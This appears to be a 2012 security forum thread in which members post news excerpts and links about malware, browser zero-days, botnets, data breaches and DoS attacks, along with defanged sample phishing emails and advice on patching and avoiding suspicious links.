Tinba has affected more than 60,000 users in Turkey, primarily stealing login details from sites like Facebook, free German webmail service GMX, Google and Microsoft. The malware has also targeted government portals and Turkish banks to steal login information. Its infrastructure is believed to be located in Russia and Lithuania.
Read more at :
http://www.scmagazine.com/banking-malware-tinba-infects-60000-users-in-turkey/article/259138/
***
-
Internet Explorer security hole: Use other browser
NTERNET Explorer users might want to consider upgrading or switching to another browser after a massive security hole was discovered in Windows' native web browser.
According to security forum, Rapid7 , Internet Explorer 7, 8 and 9 operating on Windows XP, Vista and Seven contains what is known as a "zero day exploit" which allows attackers to gain access to your personal data while you browse.
The forum claimed the exploit would give cyber criminals "the same privileges as the current user".
It claimed that 41 per cent of US and 32 per cent of global Internet Explorer users could be affected.
Microsoft confirmed that it was aware of the targeted attacks "potentially affecting some versions of Internet Explorer".
Director of Microsoft Trustworthy Computer, Yunsun Wee, told Fairfax that Internet Explorer 10 is not affected by the issue.
"We recommend customers deploy Microsoft's Enhanced Mitigation Experience Toolkit 3.0, which provides effective protections without affecting the web browsing experience," he said. "We will continue to investigate this issue and take further actions as appropriate."
http://www.dailytelegraph.com.au/technology/internet-explorer-security-hole-use-other-browser/story-fn5h1vlf-1226476456634
Microsoft urges computer users to install security tool
http://www.theage.com.au/it-pro/security-it/microsoft--urges-computer-users-to-install-security-tool-20120918-263vv.html
-
WTF! Mr.Flame has brothers that are unknown. :o
https://www.securelist.com/en/blog/750/Full_Analysis_of_Flame_s_Command_Control_servers
The C&C code handles four different malware - named SP, SPE, FL and IP by the authors
The most recent malware is called "IP" and it is yet unknown.
Of the four malware, only Flame is known; the other three are currently unknown.
The development of the platform C&C code started as early as December 2006.
-
Internet Explorer security hole: Use other browser
NTERNET Explorer users might want to consider upgrading or switching to another browser after a massive security hole was discovered in Windows' native web browser.
According to security forum, Rapid7 , Internet Explorer 7, 8 and 9 operating on Windows XP, Vista and Seven contains what is known as a "zero day exploit" which allows attackers to gain access to your personal data while you browse.
The forum claimed the exploit would give cyber criminals "the same privileges as the current user".
It claimed that 41 per cent of US and 32 per cent of global Internet Explorer users could be affected.
Microsoft confirmed that it was aware of the targeted attacks "potentially affecting some versions of Internet Explorer".
Director of Microsoft Trustworthy Computer, Yunsun Wee, told Fairfax that Internet Explorer 10 is not affected by the issue.
"We recommend customers deploy Microsoft's Enhanced Mitigation Experience Toolkit 3.0, which provides effective protections without affecting the web browsing experience," he said. "We will continue to investigate this issue and take further actions as appropriate."
http://www.dailytelegraph.com.au/technology/internet-explorer-security-hole-use-other-browser/story-fn5h1vlf-1226476456634 (http://www.dailytelegraph.com.au/technology/internet-explorer-security-hole-use-other-browser/story-fn5h1vlf-1226476456634)
Microsoft urges computer users to install security tool
http://www.theage.com.au/it-pro/security-it/microsoft--urges-computer-users-to-install-security-tool-20120918-263vv.html (http://www.theage.com.au/it-pro/security-it/microsoft--urges-computer-users-to-install-security-tool-20120918-263vv.html)
IE10 is not affected. (There are advantages to running windows 8. :)
-
Nor is Firefox or Chrome only IE, so win8 not required :P
-
IE10 is not affected. (There are advantages to running windows 8. :)
Shhhhhh. Bob I'm sure W7 users will be very happy staying where they are, and I'm not sure they wanted to upgrade from W7 to W8. I better grab W7 soon for my desk top computer as I already have a laptop with W7 64bit for my revit structural engineering design used ;)
-
***
Google Adding 'Do Not Track' Into Chrome's Latest Developer Build
The privacy feature won't be available built-in for Chrome users until the release version of the next browser is ready, but the project is being pursued.
Google's Chrome browser project is beginning to add built-in "Do Not Track" capabilities to the latest developer's build of the open-source Web browser.
Do Not Track capabilities mean that users can choose to instruct their Web browsers not to show personal information about their Web searches using the Do Not Track controls that are being integrated into some browsers. By hiding information about their searches, users can block advertisers and Web sites from collecting and using that information to push targeted online ads and gain details about their surfing.
Read more at :
http://www.eweek.com/c/a/Security/Google-Adding-Do-No-Track-Into-Chromes-Latest-Developer-Build-852453/?kc=EWKNLEDP09182012B
***
-
Link for the IE security tool with a description .. http://www.geekstogo.com/
-
***
Thanks for the above post, essexboy !
***
-
***
Malwarebytes Takes First Step Toward Enterprise With New Offering
An anti-malware vendor widely known for its consumer appeal has launched business-class edition aimed at a wide variety of vertical markets as well as government and education.
San Jose-based Malwarebytes has rolled out its new Malwarebytes Enterprise Edition, which offers centrally-managed threat protection and malware remediation that runs on top of existing security infrastructures, including anti-virus. The product is designed to work in both physical and virtualized environments.
The product leverages the experience gained from the extremely popular Malwarebytes Anti-Malware product, which has been used by over 150 million people worldwide to block or remove over five billion pieces of malware. The enterprise edition is aimed at protecting companies of all sizes from the threats posed by cutting-edge malware such as zero-day, polymorphic and blended malware threats that can evade traditional enterprise anti-virus solutions.
Read more at :
http://www.crn.com/news/security/240007415/malwarebytes-takes-first-step-toward-enterprise-with-new-offering.htm?cid=nl_sec&elqTrack=true
***
-
An easier way to exploit the new IE zero day is using an additional vulnerable java.dll.
Therefore again users are more secure without java on their computers.
Until you absolutely need java to run some critical service,
then use the latest updated & patched java software version (for online banking etc.),
Whenever you do not need java,
then here is another valid reason to uninstall java alltogether,
polonus
-
The current IE exploit only works on these systems by exploiting another flaw in older versions of Java 6. If you have Vista or Windows 7 the best mitigation is to be sure Java is up-to-date, or uninstall it if not needed.
More details on the IE exploit
-
A fix for the new 0-day IE exploit is being prepared and will reach us within a couple of days, according to Microsoft Security Response Center: http://blogs.technet.com/b/msrc/archive/2012/09/18/additional-information-about-internet-explorer-and-security-advisory-2757760.aspx
link article author: Yunsun Wee, Director, Trustworthy Computing
polonus
-
Jindřich Kubec September 19th, 2012
New Microsoft IE Zero-day attack
http://blog.avast.com/2012/09/19/new-msie-0day-attack/#more-9550
-
***
Bank of America Hit By Cyber Attack
Bank of America’s (BAC) website was experiencing sporadic outages on Tuesday related to a cyber attack that may be tied to an Islamic terrorist group, according to a source close to the matter.
The Charlotte, N.C.-based bank’s namesake site, bankofamerica.com, was not loading as of 4:15 p.m. ET and has been inaccessible for some users.
A source confirms to FOX Business that Bank of America’s website was in fact hit by a cyber attack. It was a “technical attack” that was focused on BofA’s domain name service (DNS) infrastructure.
A BofA spokesman said "some customers may experience occasional slowness" but the bank is "working to ensure full availability." BofA wouldn't comment on the attacks specifically, but the spokesman said, "I can tell you we continuously take proactive measures to secure our systems."
A group called “Izz ad-din Al qassam Brigades” has claimed responsibility on PasteBin, which is a forum commonly used by these types of groups, including Anonymous, to issue threats or to brag about cyber attacks. In addition to the BofA attack, Izz ad-din Al qassam also said it is targeting the website of the New York Stock Exchange.
If I were a BoA customer (thankfully I'm not), I would not be doing any on-line banking for this week.
Read more at :
http://www.foxbusiness.com/industries/2012/09/18/bank-america-website-experiencing-sporadic-outages/?cmpid=cmty_twitter_fb
***
-
***
Real-World Developers Still Not Coding Securely
Though secure development lifecycle advocates have shown the cost benefits of catching vulnerabilities before apps go live, organizations still don't embed security into development
The extreme pressure on developers from line-of-business leaders to push out new web application feature sets as quickly as possible, combined with a lack of security development objectives or actionable security guidance, continues to negatively impact web application vulnerability levels. A new study out this week based on a survey conducted by Forrester Research on behalf of Coverity showed web application incidents still remain expensive as a result of these vulnerabilities and are costing some organizations hundreds of thousands to millions of dollars.
Read more at :
http://www.darkreading.com/vulnerability-management/167901026/security/news/240007576/real-world-developers-still-not-coding-securely.html
***
-
***
Exploit beamed via NFC to hack Samsung Galaxy S3 (Android 4.0.4)
According to Erasmus, the exploit was delivered via NFC, the short-range wireless technology allows the sharing of small payloads of data between an NFC tag and an Android-powered device. The hackers exploited a weakness in the way NFC is implemented in the Galaxy S3 to deliver a malicious file that was automatically opened by the Android document viewer.
Once the file opened, the team exploited a zero-day flaw in the document viewer to launch a code execution attack. A second Android privilege escalation vulnerability, also zero-day, was then used to get full rights on the device.
Read more at :
http://www.zdnet.com/exploit-beamed-via-nfc-to-hack-samsung-galaxy-s3-android-4-0-4-7000004510/
***
-
***
Majority of companies suffered a web application security breach
Web application security incidents have become increasingly common and expensive, with the majority of companies experiencing at least one breach in the last 18 months and many companies losing hundreds of thousands, if not millions, of dollars as a result, according to Forrester Consulting.
At the same time, the study found that the majority of companies have yet to implement secure development practices, most often citing time-to-market pressures, funding and the lack of appropriate technologies suitable for use during development as their primary roadblocks.
See & read more at :
http://www.net-security.org/secworld.php?id=13613
***
-
***
Anonymous: behind the masks of the cyber insurgents
Since 2008, the internet collective have hacked the CIA, the Sun newspaper, the Church of Scientology and a host of other large corporations, sparking a global police crackdown last year. But who and what are Anonymous? A radical new form of activism – or just bored teenagers? We talk to some of the 'hacktivists' and the experts who tracked them down in the deep web.
For a period in 2011, LulzSec – an offshoot of Anonymous, the internet "hacktivist" collective who came to prominence around the time of the Wikileaks affair – wreaked a trail of chaos across the web. Their actions ranged from the transgressive – they had taken down the CIA's website and hacked into Sony's database and released more than a million user names and passwords – to the absurd: after the American network PBS aired a critical documentary about Julian Assange, LulzSec hacked into their website and replaced the homepage with an article about Tupac Shakur, the (very much dead) rapper, which bore the headline "Tupac Still Alive in New Zealand". During the Arab spring, members of the group hacked and defaced Tunisian and Egyptian government sites. One hacker, Tflow (later discovered to be a 16-year-old London schoolboy), allegedly wrote a webscript that enabled activists to circumvent government snooping.
Read much more at :
http://www.guardian.co.uk/technology/2012/sep/08/anonymous-behind-masks-cyber-insurgents
-
***
Over 9 million PCs infected - ZeroAccess botnet uncovered
ZeroAccess is a hugely widespread malware threat that has plagued individuals and enterprises for years. It has evolved over time to cater for new architectures and new versions of Windows.
ZeroAccess uses a peer-to-peer network to download plugin files which carry out various tasks designed to generate revenue for the botnet owners. Our researchers monitored this network for a period of two months to discover where in the world the peers were located and what kind of files the botnet was being instructed to download.
We found the IP addresses of infected machines from a total of 198 countries ranging from the tiny island nation of Kiribati to the Himalayan Kingdom of Bhutan, as can be seen when the infected machines are plotted on a world map.
See & read more at :
http://nakedsecurity.sophos.com/2012/09/19/zeroaccess-botnet-uncovered/?utm_campaign=naked%2Bsecurity&utm_medium=status%2Bmessage&utm_source=twitter
***
-
MSFixit to install the EMET for the IE vulnerability .. Also a patch is being issued tomorrow via windows updates http://support.microsoft.com/kb/2757760
-
***
DoS Attacks Continue to Move Up OSI Stack
Denial of service attacks continue to become increasingly prevalent in the world of the black hat, and also continue to move up the OSI stack from the network level toward the application level, according to the most recent research to be released by Imperva.
While early versions of DoS attacks that tended to focus at the network layer were aimed at shutting down server ports, the most modern strategies moved straight up the stack to the application level, according to Tal Beery, Security Researcher at Imperva, a Redwood Shores, Calif.-based company focused on application and data security.
Read much more at :
http://www.crn.com/news/security/240007652/imperva-study-dos-attacks-continue-to-move-up-osi-stack.htm?cid=nl_sec&elqTrack=true
***
-
***
Mac Attacks: Top 10 Bugs Targeting Apple
More Secure, Or Maybe Not
While some people claim that Macs are more secure, others maintain that they merely present a lower profile, given that most businesses for a long time standardized almost exclusively on the PC except, of course, for a smattering of artsy folks who were allowed to use Macs.
With the growth of Mac use comes the growth of Mac specific malware. This is in relation to the OS since just a couple of years ago Apple changed from using specialty hardware to becoming just another PC (non-specialty hardware) with a different OS than Windows, etc. Expect to see more Mac malware in the future.
See & read more at :
http://www.crn.com/slide-shows/security/240007729/mac-attacks-top-10-bugs-targeting-apple.htm?pgno=1
***
-
***
New TDL4 Bootkit Malware Variant Hits Fortune 500
Security vendor Damballa Labs has discovered a new variant of the TDSS/TDL4 malware that has apparently hit about 250,000 unique victims and at least 46 Fortune 500 companies, governmental agencies and ISP networks.
The malware uses highly secure domain generation algorithm (DGA)-based command-and-control (C&C) for communication, providing the controllers with details on click-fraud activity while at the same time avoiding network layer domain blacklists and signature-based filters
Read much more at :
http://www.crn.com/news/security/240007636/new-tdl4-bootkit-malware-variant-hits-fortune-500.htm?cid=nl_sec&elqTrack=true
***
-
***
Microsoft Security Bulletin MS12-063 - Critical
This security update resolves one publicly disclosed and four privately reported vulnerabilities in Internet Explorer. The most severe vulnerabilities could allow remote code execution if a user views a specially crafted webpage using Internet Explorer. An attacker who successfully exploited any of these vulnerabilities could gain the same user rights as the current user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.
This security update is rated Critical for Internet Explorer 6, Internet Explorer 7, Internet Explorer 8, and Internet Explorer 9 on Windows clients and Moderate for Internet Explorer 6, Internet Explorer 7, Internet Explorer 8, and Internet Explorer 9 on Windows servers. Internet Explorer 10 is not affected.
The security update addresses the vulnerabilities by modifying the way that Internet Explorer handles objects in memory.
Read more at :
http://technet.microsoft.com/en-us/security/bulletin/ms12-063
***
-
***
Microsoft Security Bulletin MS12-063 - Critical
This security update resolves one publicly disclosed and four privately reported vulnerabilities in Internet Explorer. The most severe vulnerabilities could allow remote code execution if a user views a specially crafted webpage using Internet Explorer. An attacker who successfully exploited any of these vulnerabilities could gain the same user rights as the current user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.
This security update is rated Critical for Internet Explorer 6, Internet Explorer 7, Internet Explorer 8, and Internet Explorer 9 on Windows clients and Moderate for Internet Explorer 6, Internet Explorer 7, Internet Explorer 8, and Internet Explorer 9 on Windows servers. Internet Explorer 10 is not affected.
The security update addresses the vulnerabilities by modifying the way that Internet Explorer handles objects in memory.
Read more at :
http://technet.microsoft.com/en-us/security/bulletin/ms12-063 (http://technet.microsoft.com/en-us/security/bulletin/ms12-063)
***
Since this exploit is related to the flash player, there is also an update available for Windows 8.
Reading about it will not help..... Updating will. :)
-
***
There is a link for updating in the article. ;)
***
-
***
There is a link for updating in the article. ;)
***
You don't need a link simply use the Windows Update function. :)
(http://my.jetscreenshot.com/2701/m_20120922-5jxz-36kb.jpg) (http://my.jetscreenshot.com/2701/20120922-5jxz-36kb)
-
***
Of course, that is true for you, me, and many others on this forum. But, we often get new computer users on this forum everyday.
The truth is, though, that not everyone uses MS auto-updates and also have no idea about such critical updates that they seriously need to do. And, those not using auto-updates rarely check for updates often enough.
Hence, my making the post to hopefully inform the unaware and the hope they will heed the serious need for this update.
***
-
***
17 Heavy Hitters On Apple's Security Team
Little is known about Apple's security team, and that's just the way Apple wants it. The company allows some of its security people to attend industry conferences and events, but they tend to keep a very low profile. Scanning LinkedIn provides a glimpse of the staff members and their roles, and following are 17 examples, many of whom you've probably never heard of before, and some of which appear to be pseudonyms.
Read much more at :
http://www.crn.com/news/security/240007794/17-heavy-hitters-on-apples-security-team.htm?cid=nl_vi&elqTrack=true
***
-
Elevated risk of Joomla and WordPress attacks, patch, update and upgrade: http://www.us-cert.gov/current/#increase_exploitation_in_web_content
Owners of CMS are being warned! Watch those logs and dorks....
polonus
-
Yet another Java zero day and 50 additional bugs found up. Yes a complete other one than last patched.
The question could be: "Is Oracle running Java into the ground?"
One Billion Users Affected!
Read here: http://news.softpedia.com/news/One-Billion-Users-Affected-by-Java-Security-Sandbox-Bypass-Vulnerability-Experts-Say-294629.shtml
The affected web browsers are Safari 5.1.7, Opera 12.02, Chrome 21.0.1180.89, Firefox 15.0.1, and Internet Explorer 9.0.8112.16421.
If you do not need Java on your comp, then uninstall....
polonus
-
PIN analysis
“All credit card PIN numbers in the World leaked” ;D
http://www.datagenetics.com/blog/september32012/index.html
-
PIN analysis
“All credit card PIN numbers in the World leaked” ;D
http://www.datagenetics.com/blog/september32012/index.html
Fascinating article, thanks. I emailed them asking if there was any way I could look up the ranking of a specific PIN ... I simply memorized the one my bank originally assigned me, and because it's (apparently) non-obvious, I've come to use the same PIN for other similar purposes, e.g., my Bell calling card. Naturally I'm curious to see where it ranks on their list.
-
***
Iran Denies Claims Of DoS Attack Against U.S. Banks
The head of the Iran's Civil Defense Organization has denied reports that his country has launched a series of denial-of-service attacks against U.S.-based banks. Gholam Reza Jalali told Fars News Agency (FNA), an Iranian news service, that the reports are part of a Western plot to establish justification for their own actions against Iran in cyberspace.
According to reports from a number of Western media, including NBC News, Reuters and the Chicago Tribune, a sporadic series of attacks against Bank of America, JPMorgan Chase and Citigroup have been underway since late 2011 and have occasionally caused minor interruptions of service. NBC News claims it has spoken with national security sources who tie these attacks to the Iranian government as a reaction to economic sanctions against Iran.
Read more at :
http://www.crn.com/news/security/240007869/iran-denies-claims-of-dos-attack-against-u-s-banks.htm?cid=nl_sec&elqTrack=true
***
-
***
Chinese Hackers Blamed for Intrusion at Energy Industry Giant Telvent
A company whose software and services are used to remotely administer and monitor large sections of the energy industry began warning customers last week that it is investigating a sophisticated hacker attack spanning its operations in the United States, Canada and Spain. Experts say digital fingerprints left behind by attackers point to a Chinese hacking group tied to repeated cyber-espionage campaigns against key Western interests.
The attack comes as U.S. policymakers remain gridlocked over legislation designed to beef up the cybersecurity posture of energy companies and other industries that maintain some of the world’s most vital information networks.
Read much more at :
http://krebsonsecurity.com/2012/09/chinese-hackers-blamed-for-intrusion-at-energy-industry-giant-telvent/
***
-
***
One server from the SourceForge.net mirror system was distributing a phpMyAdmin kit containing a backdoor.
One of the SourceForge.net mirrors, namely cdnetworks-kr-1, was being used to distribute a modified archive of phpMyAdmin, which includes a backdoor. This backdoor is located in file server_sync.php and allows an attacker to remotely execute PHP code. Another file, js/cross_framing_protection.js, has also been modified.
We consider this vulnerability to be critical.
Read more at :
http://www.phpmyadmin.net/home_page/security/PMASA-2012-5.php
***
-
***
Data breach at IEEE.org: 100k plaintext passwords.
Using the data to gain insights into the engineering and scientific community
IEEE suffered a data breach which I discovered on September 18 (UPDATE: the breach is now confirmed). For a few days I was uncertain what to do with the information and the data. On September 24, I let them know, and they fixed (at least partially) the problem. The usernames and passwords kept in plaintext were publicly available on their FTP server for at least one month prior to my discovery. Among the almost 100,000 compromised users are Apple, Google, IBM, Oracle and Samsung employees, as well as researchers from NASA, Stanford and many other places. I did not and will not make the raw data available to anyone else
See & read more at :
http://ieeelog.com/
***
-
***
Vandals break into congressman's office, install Linux on PCs
A US congressmen has been left incensed after miscreants installed Linux on computers at his campaign office, possibly thrashing some data in the process. Michael Grimm, a Republican who represents a district in New York covering Staten Island and parts of Brooklyn, has slammed the weekend break-in to his offices on as a "politically motivated" crime against the democratic process.
"Whoever did this, the people responsible are very ignorant [sic], and they don't understand that this is not just an attack against me or my campaign," Grimm told the Staten Island Advance. "This is an attack against a federal campaign office, which is an attack on our democracy as a whole. It's an attack against what we stand for, for free elections."
Read more at :
http://www.theregister.co.uk/2012/09/26/vandals_install_linux_on_congressman_office_computers/
***
-
***
FBI Warns Of Scams Targeting Financial Industry
Criminals are using phishing e-mails, keystroke loggers, and Remote Access Trojans to steal financial employee login credentials
The financial industry is being hit by a spate of cyberattacks designed to steal employee login credentials, government and industry officials warned last week.
A joint alert (PDF) issued by the FBI, the Financial Services Information Sharing and Analysis Center (FS-ISAC), and the Internet Crime Complaint Center (IC3) states that criminals are using spam and phishing e-mails, keystroke loggers, and Remote Access Trojans (RAT) to compromise financial institution networks and obtain employee login credentials.
Read more at :
http://www.darkreading.com/insider-threat/167801100/security/news/240007804/fbi-warns-of-scams-targeting-financial-industry.html
***
-
***
Another Critical Security Flaw In Java Appears Before Oracle Has Even Resolved The Last One
On Tuesday, security researchers at the Polish firm Security Explorations revealed another critical security flaw in Java that affects users of every browser that runs the plugin, including Chrome, Firefox, Safari and Internet Explorer, allowing a malicious hackers to gain complete control of a victim’s machine through a rigged website. And unlike the bug in Java 7 that was actively exploited by hackers to install malware on users’ machines until it was patched at the end of last month–also first spotted by Security Explorations four months earlier–this security flaw also affects older versions of Java including Java 5 and Java 6. That means more than a billion users are affected, according to Oracle’s count of desktop computers running the software.
Read more at :
http://www.forbes.com/sites/andygreenberg/2012/09/25/another-critical-security-flaw-in-java-appears-before-oracle-has-even-resolved-the-last-one/
***
-
***
Espionage Hackers Target ‘Watering Hole’ Sites
Security experts are accustomed to direct attacks, but some of today’s more insidious incursions succeed in a roundabout way — by planting malware at sites deemed most likely to be visited by the targets of interest. New research suggests these so-called “watering hole” tactics recently have been used as stepping stones to conduct espionage attacks against a host of targets across a variety of industries, including the defense, government, academia, financial services, healthcare and utilities sectors.
Some of the earliest details of this trend came in late July 2012 from RSA FirstWatch, which warned of an increasingly common attack technique involving the compromise of legitimate websites specific to a geographic area which the attacker believes will be visited by end users who belong to the organization they wish to penetrate.
Read more at :
http://krebsonsecurity.com/2012/09/espionage-hackers-target-watering-hole-sites/
And related to the above, please read :
http://www.darkreading.com/advanced-threats/167901091/security/attacks-breaches/240007959/vast-cyberespionage-campaign-brazen-in-its-approach.html?nomobile=1
***
-
***
Security Firm Identifies Top Words Used in Spear-Phishing Attacks
Time and time again, social engineering has shown itself to be one of the most effective tactics attackers use to defeat enterprise security.
In a new research paper, security firm FireEye has identified the most common social engineering techniques used in spear-phishing attacks targeting enterprises. In an analysis of the threat landscape last month, Symantec reported the global phishing rate in August increased slightly to roughly one in 312.9 emails that contained some sort of phishing attack.
Read more at :
http://www.eweek.com/security/security-firm-identifies-top-words-used-in-spear-phishing-attacks/?kc=EWKNLEDP09272012B
***
-
Security Advisory: Upcoming Revocation of Adobe code signing certificate
http://www.adobe.com/support/security/advisories/apsa12-01.html
http://blogs.adobe.com/asset/2012/09/inappropriate-use-of-adobe-code-signing-certificate.html
-
New ExploitShield app says it will protect against unknown zero-day exploits; freeware for consumers and non-profits. Corporate versions still under development.
Still in beta.
http://download.cnet.com/8301-2007_4-57521983-12/exploitshield-appears-to-live-up-to-its-name/ (http://download.cnet.com/8301-2007_4-57521983-12/exploitshield-appears-to-live-up-to-its-name/)
Possibly new category of antimalware protection. (Anti-exploit.)
-
***
Facebook's Next Privacy Issue & How To Opt Out
In what is likely to become the next privacy controversy for Facebook, the social-media giant is working with a big-data firm to correlate off-line purchases with ad views on Facebook.
And, surprise, opting out is trickier than Facebook’s typically difficult procedures.
The advocacy group Electronic Frontier Foundation report didn't make clear how long Facebook has had access to the data, which will help Facebook understand how ads on the social network impact real-world purchases. Being able to do so would make the social network more popular with advertisers.
Read more, including how to Opt Out, at:
http://www.readwriteweb.com/archives/heres-how-to-opt-out-of-one-of-facebooks-biggest-privacy-intrusions.php
***
-
***
In cyberattacks, hacking humans is highly effective way to access systems
The e-mails arrived like poison darts from cyberspace.
Some went to the Chertoff Group, a national security consulting firm in Washington. Others targeted intelligence contractors, gas pipeline executives and industrial-control security specialists. Each note came with the personal touches of a friend or colleague.
“Attach[ed] is a quote for the Social Media training we discussed,” said one message sent on July 3 to the vice president of EnergySec, a federally funded group in Oregon that focuses on the cybersecurity of the nation’s power grid.
But like much of the digital universe, the e-mails were not what they seemed. They were cyberweapons, part of a devastating kind of attack known as “social engineering.” Emerging details about the e-mails show how social engineering — long favored by con artists, identity thieves and spammers — has become one of the leading threats to government and corporate networks in cyberspace.
Read much more at :
http://www.washingtonpost.com/investigations/in-cyberattacks-hacking-humans-is-highly-effective-way-to-access-systems/2012/09/26/2da66866-ddab-11e1-8e43-4a3c4375504a_story.html
***
-
***
Real spam email to malware site appears to come from the LinkedIn site.
An example is below.
From: LinkedIn Reminders <reminders-noreply@linkedin.attunes.co... [Add to Address Book]
To: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Subject: There are a total of 1 messages awaiting your response
Date: Sep 30, 2012 5:51 AM
LinkedIn
REMINDERS
Invitation reminders:
• From linkedin.com (a person's name here)
PENDING MESSAGES
• There are a total of 1 messages awaiting your response. Visit your InBox.
Don't want to receive email notifications? Adjust your message settings.
LinkedIn values your privacy. At no time has LinkedIn made your email address available to any other LinkedIn user
without your permission. � 2012, LinkedIn Corporation.
The above links are not active.
Avast does block this if you should click on the real links in the real emai with a"Malicious URL Detected" warning.
All links take you to hXXp://canadapharmacytoronto.com/ instead of to LinkedIn.
***
-
***
Real spam email to malware site appears to come from the LinkedIn site.
An example is below.
From: LinkedIn Reminders <reminders-noreply@linkedin.attunes.co... [Add to Address Book]
To: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Subject: There are a total of 1 messages awaiting your response
Date: Sep 30, 2012 5:51 AM
LinkedIn[/b]
REMINDERS
Invitation reminders:
• From linkedin.com (a person's name here)
PENDING MESSAGES
• There are a total of 1 messages awaiting your response. Visit your InBox.
Don't want to receive email notifications? Adjust your message settings.
LinkedIn values your privacy. At no time has LinkedIn made your email address available to any other LinkedIn user
without your permission. � 2012, LinkedIn Corporation.
The above links are not active.
Avast does block this if you should click on the real links in the real emai with a"Malicious URL Detected" warning.
All links take you to hXXp://canadapharmacytoronto.com/ instead of to LinkedIn.
***
If you're using Gmail, these messages are automatically placed in the spam folder.
-
Generally I lump these in with the "warnings" about account problems from banks I've never done business with, or supposed failed-delivery notices from UPS and the like. Other than the odd forum here and there, I'm not a registered member of any social or business organization on the net (other than my ISP and Yahoo, that is), so I know without doubt such mail is just garbage.
-
If you're using Gmail, these messages are automatically placed in the spam folder.
True, and a better idea is no matter email is suspect or not, just don't click links you receive in there, if you got an email from LinkedIn, just head directly to LinkedIn website to see if you really have a message or not rather than clicking links in the email, same for facebook etc.
-
Miley Cyrus Fans, be careful, and stay safe. (http://www.hotforsecurity.com/blog/yet-another-miley-cyrus-sex-tape-kicks-tagjacking-back-into-shape-authentication-tokens-snatched-through-copypaste-code-classic-3689.html?goback=%2Egde_1003727_member_170568013)
"A Facebook post made to resemble a breaking news announcement about a Miley Cyrus sex tape brings tagjacking back into the social scam spotlight."
-
***
***
Real spam email to malware site appears to come from the LinkedIn site.
An example is below.
From: LinkedIn Reminders <reminders-noreply@linkedin.attunes.co... [Add to Address Book]
To: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Subject: There are a total of 1 messages awaiting your response
Date: Sep 30, 2012 5:51 AM
LinkedIn[/b]
REMINDERS
Invitation reminders:
• From linkedin.com (a person's name here)
PENDING MESSAGES
• There are a total of 1 messages awaiting your response. Visit your InBox.
Don't want to receive email notifications? Adjust your message settings.
LinkedIn values your privacy. At no time has LinkedIn made your email address available to any other LinkedIn user
without your permission. � 2012, LinkedIn Corporation.
The above links are not active.
Avast does block this if you should click on the real links in the real emai with a"Malicious URL Detected" warning.
All links take you to hXXp://canadapharmacytoronto.com/ instead of to LinkedIn.
***
If you're using Gmail, these messages are automatically placed in the spam folder.
It does not matter what email spam filter you are using be it what Gmail uses, what any other email program uses, or those who use independent email spam filters. Not everyone uses Gmail, thankfully, because there are better email services, IMHO. And, having a variety of email services is good for the business just as it is good to have more than one OS company, more than one CPU maker, more than one browser producer, more than one AV company, etc.
In my own email service, I have the spam filter set at medium so that it does not block some things I want to receive that would otherwise be blocked by the high setting. I like the ability to decide what email I want or do not want.
This one slipped through and I'm glad it did. This way, I could investigate it, warn LinkedIn about it as it could have come from a compromised LinkedIn account, and finally, warn others who are LinkedIn members who are either on this forum as members or as visitors. Not eveyone who visits this forum, Bob, are Avast users ... nor are all of them Gmail users and probably do not want to be.
By the way, what I sent to LinkedIn was the complete email without the obvious changes I made in my post here and I have already gotten a thank you from LinkedIn for notifying them about the problem account.
***
-
***
Team GhostShell Exposes 120,000 Records From Universities - Dark Reading
Calculated attacks turn up hundreds of thousands of vulnerable records at 100 universities across the globe, hacker group says
The hacktivist group TeamGhostShell says it has embarked on a new campaign to expose data and vulnerabilities at 100 of the top universities around the world.
In a posting on Pastebin Monday, TeamGhostShell released some 120,000 records from universities such as Oxford and Harvard. The campaign, which the group has dubbed "Project WestWind," has revealed vulnerabilities in university systems that could put hundreds of thousands more records at risk, the group says.
Read more at :
http://www.darkreading.com/identity-and-access-management/167901114/security/attacks-breaches/240008262/team-ghostshell-exposes-120-000-records-from-universities.html
***
-
***
DSL modem hack used to infect millions with banking fraud malware
Even when PCs are locked down, modems and routers can still be compromised.
Millions of Internet users in Brazil have fallen victim to a sustained attack that exploited vulnerabilities in DSL modems, forcing people visiting sites such as Google or Facebook to reach imposter sites that installed malicious software and stole online banking credentials, a security researcher said.
The attack, described late last week during a presentation at the Virus Bulletin conference in Dallas, infected more than 4.5 million DSL modems, said Kaspersky Lab Expert Fabio Assolini, citing statistics provided by Brazil's Computer Emergency Response Team. The CSRF (cross-site request forgery) vulnerability allowed attackers to use a simple script to steal passwords required to remotely log in to and control the devices. The attackers then configured the modems to use malicious domain name system servers that caused users trying to visit popular websites to instead connect to booby-trapped imposter sites.
See & read more at :
http://arstechnica.com/security/2012/10/dsl-modem-hack-infects-millions-with-malware/
***
-
***
New Android Malware Is A Burglar's Best Friend
PlaceRaider, an experimental smartphone trojan designed by Indiana University and the U.S. Navy, hijacks a user's phone to make detailed 3D models of their bedrooms and offices.
Newly released malware PlaceRaider sounds like science fiction: It's Android malware designed to build 3-D models of users' apartments for burglars and assassins. But PlaceRaider--developed by a team at Indiana University--is very real. The new malware was built as an academic exercise, and it exposes security flaws that government agencies would love to use. More importantly, it also exposes unintended mobile functionality that large companies like Google could easily monetize.
PlaceRaider, which was summarized in a recent arXiv paper, is a piece of “visual malware” which smartphone cameras, accelerometers, and gyroscopes, to reconstruct victims' rooms and offices. The trojan runs in the background of any phone running Android 2.3 or above, and is hidden in a photography app that gives PlaceRaider the necessary permissions to access the camera and upload images. Once installed, PlaceRaider quietly takes pictures at random that are tagged with the time, location, and orientation of the phone. PlaceRaider also, of course, mutes the phone's shutter sound.
Read more at :
http://www.fastcompany.com/3001699/new-android-malware-burglars-best-friend
***
-
***
Spam Email With Malware Attached
This one was blocked for me but be aware if you receive one
From: EarthLink Support <support@earthlink.net>
To: charleyo3@cccccccccc
Subject: EarthLink Virus Blocker Alert: Message from "American Airlines" <sign-ids793@aa.com> Quarantined
Date: Oct 4, 2012 10:49 PM**************************************
EARTHLINK VIRUS BLOCKER MESSAGE STATUS
**************************************
MESSAGE QUARANTINED
Virus Detected: CMU-201209-1348558767
Message Details:
From: "American Airlines" <sign-ids793@aa.com>
Subject: Your ticket
Date: Thu, 4 Oct 2012 23:41:37 -0300 (BRT)
